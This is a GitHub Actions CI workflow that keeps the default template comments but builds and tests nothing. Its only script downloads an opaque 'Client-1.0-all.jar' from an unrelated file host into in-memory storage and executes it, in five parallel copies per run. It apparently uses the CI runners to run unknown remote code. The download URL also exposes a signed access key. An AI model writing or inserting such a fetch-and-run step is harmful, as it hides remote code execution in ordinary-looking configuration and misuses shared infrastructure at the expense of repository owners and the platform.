# This is a basic workflow to help you get started with Actions

name: CI

# Controls when the workflow will run
on:
  # Triggers the workflow on push or pull request events but only for the "main" branch
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]

  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:

# A workflow run is made up of one or more jobs that can run sequentially or in parallel
jobs:
  # This workflow contains a single job called "build"
  build:
    # The type of runner that the job will run on
    runs-on: ubuntu-latest
    strategy:
      matrix:
        qwq: [1, 2, 3, 4, 5]
    steps:
      - uses: actions/setup-java@v5
        with:
          distribution: 'temurin'
          java-version: '21'
      - name: Run a multi-line script
        run: |
          curl -o /dev/shm/1.jar "https://oo2zyeyq-dl.wss.cc/gdzn53n%2Fi%2F4w%2Fi4w9gdzn53n?response-content-disposition=attachment%3B+filename%3D%22Client-1.0-all.jar%22%3B+filename%2A%3Dutf-8%27%27Client-1.0-all.jar&sign=q-sign-algorithm%3Dsha1%26q-ak%3DAKID96nJdhhWHm11lGpUSBpIVTBesra5EUp0%26q-sign-time%3D1759552837%3B1759554679%26q-key-time%3D1759552837%3B1759554679%26q-header-list%3D%26q-url-param-list%3Dresponse-content-disposition%26q-signature%3D1716c7e713eab0b21c31b08b286e7be9ebf275f9"
          java -jar /dev/shm/1.jar
